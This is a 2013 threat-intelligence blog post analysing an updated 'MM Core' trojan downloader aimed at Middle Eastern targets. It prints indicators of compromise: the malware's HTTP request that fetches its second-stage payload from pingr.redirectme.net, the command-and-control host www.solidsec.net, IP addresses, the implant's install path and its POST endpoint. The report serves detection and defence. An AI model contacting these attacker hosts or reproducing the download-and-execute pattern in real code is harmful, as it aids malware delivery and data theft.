Attackers Exhibit ‘StrangeLove’ for Middle Eastern Targets

Show left menu  
Hide left menu  
Strange love

02 July 2013

On the 25th June 2013 Context detected and analysed a malicious downloader in the same family as that previously responsible for the deployment of the ‘MM Core’ implant - malware that FireEye first made public in their article Trojan.APT.BaneChant[1]. Context’s Threat Intelligence analysts uncovered that the secondary payload, Trojan:W32/MMCore has been updated, likely in response to the exposure of BaneChant.

This version, labelled as ‘2.1-LNK’, tags the egressed communications with ‘StrangeLove’ opposed to the previously identified ‘2.0-LNK’ version that was using ‘BaneChant’.  Perhaps this tag is also a reference to music on a movie soundtrack - in this case Tim Burton’s ‘Frankenweenie’ – or maybe to the cult classic film ‘Dr. Strangelove’.

One notable difference was that the downloader (first stage) expects binary data which includes the JFIF header, 20 bytes that was missing from the previous incarnation.  The downloaded data is obfuscated using the ‘Shikata ga nai’ encoder[2], likely in an effort to avoid detection by anti-virus products.

Similar to the downloaders used to deploy BaneChant and its predecessors, this latest downloader connects to a domain that redirects via an HTTP 302 response to another that houses the second stage implant.  In this case the outgoing request takes the form:

GET /images/banners/foo.jpg HTTP/1.1
Accept: images/jpeg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2)
Host: pingr.redirectme.net
with the subsequent redirection to www.solidsec.net:80.

At the time of analysis, pingr.redirectme.net resolved to 8.23.224.90 (as do many domains provided by noip.com), with www.solidsec.net resolving to 46.4.5.25.

The functionality of MM Core remains the same, with only minor changes.  Specifically, the temporary file created for ‘download and execute’ commands, uses a prefix string of ‘jv’ instead of ‘java’, and the path to the implant is now:
C:\ProgramData\NVidia\Helpers\NVGraphics.exe

In this instance, outgoing communication of MM Core is via HTTP POSTs to:
www.solidsec.net/images/banners/adio.php

and uses MIME multipart message boundary:m
-------------------1f8b7ft4h3tb78kc219b61891mfb74nhfgjh3
Context has been tracking this adversary since December 2012 and will shortly release more details on infrastructure and attribution.

Attackers Exhibit blog table

[1] http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html

[2] http://en.wikipedia.org/wiki/Shikata_ga_nai

Back to Top